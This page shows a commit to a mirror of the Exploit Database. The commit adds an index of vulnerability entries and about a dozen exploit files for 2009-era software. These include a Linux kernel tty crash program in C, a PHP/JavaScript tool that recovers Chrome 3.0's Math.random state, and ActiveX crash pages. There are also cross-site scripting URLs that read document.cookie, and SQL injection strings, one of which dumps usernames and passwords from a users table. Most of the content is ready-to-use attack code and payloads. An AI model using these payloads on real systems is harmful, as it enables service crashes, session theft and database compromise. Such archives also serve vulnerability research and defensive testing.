bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_06_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-06 04:36:08 +00:00
parent 876876c98c
commit 5039107684
15 changed files with 600 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -29912,3 +29912,17 @@ id,file,description,date,author,platform,type,port
33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0
33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0
33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0
33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0
33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0
33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0
33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
33186,platforms/php/webapps/33186.txt,"VideoGirls forum.php t Parameter XSS",2009-08-26,Moudi,php,webapps,0
33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0
33188,platforms/php/webapps/33188.txt,"VideoGirls view.php p Parameter XSS",2009-08-26,Moudi,php,webapps,0
33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0
33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds <= 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0
33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 'CookieUsername' Cookie Parameter SQL Injection Vulnerability",2009-08-28,Inj3ct0r,php,webapps,0
33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0
33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0
33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0

Can't render this file because it is too large.

9
platforms/java/webapps/33181.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36088/info
Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks.
We don't know which versions of SiteMinder are affected. We will update this BID when more details become available.
http://www.example.com/app/function?foo=bar%e0%80%bc

260
platforms/linux/dos/33193.c Executable file
View file

@ -0,0 +1,260 @@
source: http://www.securityfocus.com/bid/36191/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8.
/* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */
#define _GNU_SOURCE 1
#include <stdio.h>
#include <pty.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <signal.h>
#include <poll.h>
#include <setjmp.h>
#include <ctype.h>
#define POLL_TIMEOUT (10*1000) /* in milliseconds */
#define LASTBUFSZ 10000
#define CMDBUFSZ 10000
#define SIGINT_LONGJMP 0
#define SIGINT_VAR 1
static void putstr(char *str, FILE *out)
{
int c;
for (c = *str++; c; c = *str++) {
if (iscntrl(c)) {
putc('\\', out);
switch(c) {
case '\n': putc('n', out); break;
case '\r': putc('r', out); break;
default: printf("%03o", c); break;
}
} else {
putc(c, out);
}
}
}
static void print_lastbytes(char *lastbytes, size_t totalbytes, FILE *out)
{
char *start = lastbytes;
if (totalbytes < LASTBUFSZ)
start = &lastbytes[LASTBUFSZ - totalbytes];
fprintf(out, "lastbytes: '");
putstr(start, out);
fprintf(out, "'");
}
static void expect(int masterfd, char *str, size_t len)
{
char lastbytes[LASTBUFSZ + 1];
size_t totalbytes = 0;
memset(lastbytes, sizeof(lastbytes), 0);
for (;;) {
char buf[1];
ssize_t bytes;
int ret;
struct pollfd fds = {
.fd = masterfd,
.events = POLLIN | POLLERR | POLLHUP,
.revents = 0,
};
ret = poll(&fds, 1, POLL_TIMEOUT);
if (ret == 0) {
fprintf(stderr, "Timeout while waiting for '");
putstr(str, stderr);
fprintf(stderr, "' ");
print_lastbytes(lastbytes, totalbytes, stderr);
fprintf(stderr,"\n");
exit(5);
}
else if (ret < 0) {
fprintf(stderr, "poll failed: %s\n", strerror(errno));
exit(4);
}
bytes = read(masterfd, buf, 1);
if (bytes == 1) {
totalbytes++;
memmove(lastbytes, lastbytes +1, LASTBUFSZ);
lastbytes[LASTBUFSZ - 1] = buf[0];
lastbytes[LASTBUFSZ] = '\0';
if (memcmp(&lastbytes[LASTBUFSZ - len], str, len) == 0)
return;
}
else if (bytes < 0) {
fprintf(stderr, "read failed: %s\n",
strerror(errno));
print_lastbytes(lastbytes, totalbytes, stderr);
fprintf(stderr,"\n");
abort();
exit(3);
}
}
}
static void resync(int masterfd)
{
static unsigned count;
char cookie[100];
char cmd[1000];
char reply[1000];
ssize_t written, bytes;
snprintf(cookie, sizeof(cookie), "_%u_", ++count);
bytes = snprintf(cmd, sizeof(cmd), "echo %s\n", cookie);
written = 0;
while (bytes) {
ssize_t sent;
sent = write(masterfd, cmd + written, bytes);
if (sent >= 0) {
written += sent;
bytes -= sent;
} else if ((errno != EAGAIN) && (errno != EINTR)) {
fprintf(stderr, "Write to child failed: %s\n", strerror(errno));
exit(2);
}
}
snprintf(reply, sizeof(reply), "\n%s", cookie);
expect(masterfd, reply, strlen(reply));
}
#if SIGINT_VAR
static volatile sig_atomic_t saw_sigint;
#endif
static void process_cmd(void)
{
char cmdbuf[CMDBUFSZ];
size_t cmdlen;
char buf[1];
cmdlen = 0;
for (;;) {
ssize_t bytes;
#if SIGINT_VAR
if (saw_sigint) {
saw_sigint = 0;
printf("^C\n");
fflush(stdout);
return;
}
#endif
bytes = read(STDIN_FILENO, buf, 1);
if (bytes == 1) {
cmdbuf[cmdlen] = '\0';
putchar(buf[0]);
fflush(stdout);
if (buf[0] == '\n') {
if (cmdlen == 0) {
printf("> ");
fflush(stdout);
}
else if (memcmp("echo ", cmdbuf, 5) == 0) {
printf("%s\n", cmdbuf + 5);
fflush(stdout);
return;
} else {
fprintf(stdout, "unknown cmd: '");
putstr(cmdbuf, stdout);
printf("'\n");
fflush(stdout);
return;
}
}
cmdlen += 1;
if (cmdlen >= CMDBUFSZ) {
fprintf(stderr, "command too long!\n");
_exit(3);
}
cmdbuf[cmdlen - 1] = buf[0];
cmdbuf[cmdlen] = '\0';
}
if (bytes == 0) {
/* EOF terminate */
_exit(0);
}
if (bytes < 0) {
fprintf(stderr, "%s read failed: %s\n",
__func__, strerror(errno));
_exit(4);
}
}
}
#if SIGINT_LONGJMP
static sigjmp_buf sigint_dest;
#endif
static void sigint_handler(int signum)
{
#if SIGINT_LONGJMP
siglongjmp(sigint_dest, 1);
#endif
#if SIGINT_VAR
saw_sigint = 1;
#endif
}
static void process_cmds(void)
{
sigset_t signal_set;
#if 1
struct sigaction act;
#endif
sigemptyset( &signal_set);
sigaddset( &signal_set, SIGINT);
/* Block sigint until I reinstall the handler */
sigprocmask(SIG_BLOCK, &signal_set, NULL);
#if 0
signal(SIGINT, sigint_handler);
#else
memset(&act, sizeof(act), 0);
act.sa_handler = &sigint_handler;
act.sa_flags = SA_NODEFER;
sigaction(SIGINT, &act, NULL);
#endif
#if SIGINT_LONGJMP
if (sigsetjmp(sigint_dest, 1)) {
printf("^C\n");
fflush(stdout);
}
#endif
sigprocmask(SIG_UNBLOCK, &signal_set, NULL);
for (;;)
process_cmd();
}
int main(int argc, char *argv[], char *environ[])
{
pid_t pid;
int masterfd;
struct winsize terminal_size;
int i;
terminal_size.ws_row = 80;
terminal_size.ws_col = 25;
terminal_size.ws_xpixel = 0;
terminal_size.ws_ypixel = 0;
pid = forkpty(&masterfd, NULL, NULL, &terminal_size);
if (pid == 0) { /* child */
char *args[] = { "/bin/sh", NULL };
char *env[] = { NULL };
#if 0
execve("/bin/bash", args, env);
#endif
#if 1
process_cmds();
#endif
_exit(1);
}
resync(masterfd);
#if 1
for (i = 0; i < 10; i++) {
usleep(100);
kill(pid, SIGINT);
}
#endif
#if 0
usleep(1000);
#endif
resync(masterfd);
return 0;
}

193
platforms/multiple/remote/33192.php Executable file
View file

@ -0,0 +1,193 @@
source: http://www.securityfocus.com/bid/36185/info
Google Chrome is prone to security vulnerability that may allow the application to generate weak random numbers.
Successfully exploiting this issue may allow attackers to obtain sensitive information or gain unauthorized access.
Chrome 3.0 Beta is vulnerable; other versions may also be affected.
<?php
define("MAX_JS_MILEAGE",10000);
$two_31=bcpow(2,31);
$two_32=bcpow(2,32);
function adv($x)
{
global $two_31;
return bcmod(bcadd(bcmul(214013,$x),"2531011"),$two_31);
}
function prev_state($state)
{
global $two_31;
// 968044885 * 214013 - 192946 * 1073741824 = 1
$state=bcmod(bcsub(bcadd($state,$two_31),"2531011"),$two_31);
$state=bcmod(bcmul("968044885",$state),$two_31);
return $state;
}
if ($_REQUEST['r1'])
{
$v1=$_REQUEST['r1'];
$v2=$_REQUEST['r2'];
$v3=$_REQUEST['r3'];
$v4=$_REQUEST['r4'];
$t=$_REQUEST['t'];
$lo1low=$v1 & 0xFFFF;
$lo2low=$v2 & 0xFFFF;
$lo1high=bcmod(bcsub(bcadd($two_32,$lo2low),bcmul(18273,$lo1low)),65536);
$lo1=bcadd(bcmul($lo1high,65536),$lo1low);
$lo2=bcadd(bcmul(18273,bcmod($lo1,65536)),bcdiv($lo1,65536,0));
$lo3=bcadd(bcmul(18273,bcmod($lo2,65536)),bcdiv($lo2,65536,0));
$lo4=bcadd(bcmul(18273,bcmod($lo3,65536)),bcdiv($lo3,65536,0));
$found_state=false;
for ($unk=0;$unk<16;$unk++)
{
$hi1low=($v1 >> 16)|(($unk & 3)<<14);
$hi2low=($v2 >> 16)|(($unk>>2)<<14);
$hi1high=bcmod(bcsub(bcadd($two_32,$hi2low),bcmul(36969,$hi1low)),65536);
if ($hi1high>=36969)
{
continue;
}
$hi1=bcadd(bcmul($hi1high,65536),$hi1low)+0;
$hi2=bcadd(bcmul(36969,($hi1 & 0xFFFF)),bcdiv($hi1,65536,0))+0;
$hi3=bcadd(bcmul(36969,($hi2 & 0xFFFF)),bcdiv($hi2,65536,0))+0;
$hi4=bcadd(bcmul(36969,($hi3 & 0xFFFF)),bcdiv($hi3,65536,0))+0;
if (($v1 == ((($hi1<<16)|($lo1 & 0xFFFF))&0x3FFFFFFF)) and
($v2 == ((($hi2<<16)|($lo2 & 0xFFFF))&0x3FFFFFFF)) and
Google Chrome v3.0 (Beta) Math.random vulnerability
10
($v3 == ((($hi3<<16)|($lo3 & 0xFFFF))&0x3FFFFFFF)) and
($v4 == ((($hi4<<16)|($lo4 & 0xFFFF))&0x3FFFFFFF)))
{
$found_state=true;
break;
}
}
if (!$found_state)
{
echo "ERROR: cannot find PRNG state (is this really Chrome 3.0?)
<br>\n";
exit;
}
echo "Math.random PRNG current state: hi=$hi4 lo=$lo4 <br>\n";
$lo5=bcadd(bcmul(18273,bcmod($lo4,65536)),bcdiv($lo4,65536,0));
$hi5=bcadd(bcmul(36969,($hi4 & 0xFFFF)),bcdiv($hi4,65536,0))+0;
$v5=(($hi5<<16)|($lo5 & 0xFFFF))&0x3FFFFFFF;
echo "Math.random next value:
<script>document.write($v5/Math.pow(2,30));</script> <br>\n";
echo " <br>\n";
echo "NOTE: Anything below this line is available only for Windows. <br>\n";
echo " <br>\n";
# Rollback
$lo=$lo1;
$hi=$hi1;
$found_initial_state=false;
for ($mileage=0;$mileage<MAX_JS_MILEAGE;$mileage++)
{
$lo_prev_low=bcdiv($lo,18273,0);
$lo_prev_high=bcmod($lo,18273);
$lo=bcadd(bcmul($lo_prev_high,65536),$lo_prev_low);
$hi_prev_low=bcdiv($hi,36969,0);
$hi_prev_high=bcmod($hi,36969);
$hi=bcadd(bcmul($hi_prev_high,65536),$hi_prev_low);
if ((bcdiv($hi,32768,0)==0) and (bcdiv($lo,32768,0)==0))
{
echo "Math.random PRNG initial state: hi=$hi lo=$lo <br>\n";
echo "Math.random PRNG mileage: $mileage [Math.random()
invocations] <br>\n";
$found_initial_state=true;
break;
}
}
if ($found_initial_state)
{
echo "<br>";
$first=$hi+0;
$second=$lo+0;
$cand=array();
for ($v=0;$v<(1<<16);$v++)
{
$state=($first<<16)|$v;
$state=adv($state);
if ((($state>>16)&0x7FFF)==$second)
{
$state=prev_state(($first<<16)|$v);
$seed_time=bcadd(bcmul(bcdiv(bcmul($t,1000),$two_31,0),$two_31),$state);
if (bccomp($seed_time,bcmul($t,1000))==1)
{
$seed_time=bcsub($seed_time,$two_31);
}
$cand[$seed_time]=$state;
}
}
Google Chrome v3.0 (Beta) Math.random vulnerability
11
# reverse sort by seed_time key (string comparison - but since 2002,
second-since-Epoch are 10 digits exactly, so string comparison=numeric comparison)
krsort($cand);
echo count($cand)." candidate(s) for MSVCRT seed and seeding time, from
most likely to least likely: <br>\n";
echo "<code>\n";
echo "<table>\n";
echo "<tr>\n";
echo " <td><b>MSVCRT PRNG Seeding time [sec]&nbsp;</b></td>\n";
echo " <td><b>MSVCRT PRNG Seeding time [UTC date]&nbsp;</b></td>";
echo " <td><b>MSVCRT PRNG seed</b></td>\n";
echo "</tr>\n";
$cn=0;
foreach ($cand as $seed_time => $st)
{
if ($cn==0)
{
$pre="<u>";
$post="</u>";
}
else
{
$pre="<i>";
$post="</i>";
}
echo "<tr>\n";
echo " <td>".$pre.substr_replace($seed_time,".",-
3,0).$post."</td>\n";
echo "
<td>".$pre.gmdate("r",bcdiv($seed_time,1000)).$post."</td>\n";
echo " <td>".$pre.$st.$post."</td>\n";
echo "</tr>\n";
$cn++;
}
echo "</table>\n";
echo "</code>\n";
echo " <br>\n";
}
else
{
echo "ERROR: Cannot find Math.random initial state (non-Windows
platform?) <br>\n";
}
}
?>
<html>
<body>
<form method="POST" onSubmit="f()">
<input type="hidden" name="r1">
<input type="hidden" name="r2">
<input type="hidden" name="r3">
<input type="hidden" name="r4">
<input type="hidden" name="t">
<input type="submit" name="dummy" value="Calculate Chrome 3.0 (Windows) Math.random
PRNG state, mileage and MSVCRT seed and seeding time">
</form>
<script>
function f()
{
document.forms[0].r1.value=Math.random()*Math.pow(2,30);
document.forms[0].r2.value=Math.random()*Math.pow(2,30);
document.forms[0].r3.value=Math.random()*Math.pow(2,30);
document.forms[0].r4.value=Math.random()*Math.pow(2,30);
document.forms[0].t.value=(new Date()).getTime()/1000;
return true;
}
</script>
<form onSubmit="alert(Math.random());return false;">
<input type="submit" name="dummy" value="Sample Math.random()">
</form>

9
platforms/multiple/webapps/33180.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36087/info
Adobe Flex SDK is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to express-install template files.
An attacker could exploit this vulnerability to execute arbitrary script code in the context of a web application built using the SDK. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Flex SDK 3.4 are vulnerable.
http://www.example.com/Flex/index.template.html?"/></object><script>alert('XSS')</script>

9
platforms/novell/dos/33183.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36139/info
The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
Novell Client 4.91.5.1 is vulnerable; other versions may also be affected.
<html><body> <object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object> </body></html>

9
platforms/novell/dos/33184.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36139/info
The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
Novell Client 4.91.5.1 is vulnerable; other versions may also be affected.
<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html>

7
platforms/php/webapps/33186.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36168/info
VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/forum.php?ftid=2&t="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33187.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36168/info
VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/profile.php?profile_name="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33188.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36168/info
VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/view.php?p="><script>alert(document.cookie);</script>

10
platforms/php/webapps/33189.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/36171/info
PHP-Fusion is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
The following example URIs are available:
http://www.example.com/members.php?sortby[]=A
http://www.example.com/messages.php?folder[]=inbox

13
platforms/php/webapps/33190.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/36173/info
OpenAutoClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to OpenAutoClassifieds 1.6.0 are vulnerable.
The following proof-of-concept URIs are available:
http://www.example.com/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users
http://www.example.com/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid=

11
platforms/php/webapps/33191.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36179/info
FlexCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FlexCMS 2.5 and prior versions are vulnerable.
FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI
FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI

35
platforms/php/webapps/33195.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Team Helpdesk Customer Web Service (CWS) Remote User Credential Dump exploit
# Exploit Title: Team Helpdesk Technician Web Access (TWA) Remote User Credential Dump exploit
# Date: May 5, 2014
# Exploit Author: bhamb (ccb3b72@gmail.com)
# Vendor Homepage: http://www.assistmyteam.net/TeamHelpdesk/
# Software Link: http://www.assistmyteam.net/TeamHelpdesk/Download.asp
# Version: 8.3.5 (and probably prior)
# Tested on: Windows 2008 R2
# CVE : -
Recommendation:
Usage: ./user_cred_dump_cws.py https://Hostname.com
You will get a username:encrypted-password pairs.
To decrypt the encrypted passwords, please use my Password Decrypt script
(decrypt_cws.py) for Team Helpdesk CWS.
Usage: ./user_cred_dump_twa.py https://Hostname.com
You will get a username:encrypted-password pairs.
To decrypt the encrypted passwords, please use my Password Decrypt script
(decrypt_twa.py) for Team Helpdesk TWA.
Verifying exploits
https://www.youtube.com/watch?v=pJ1fGN3DIMU&feature=youtu.be
Exploit-DB Mirror: http://www.exploit-db.com/sploits/33195-Team_Helpdesk_Web.zip

7
platforms/windows/dos/33185.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36144/info
The Nokia Lotus Notes Connector 'lnresobject.dll' ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html>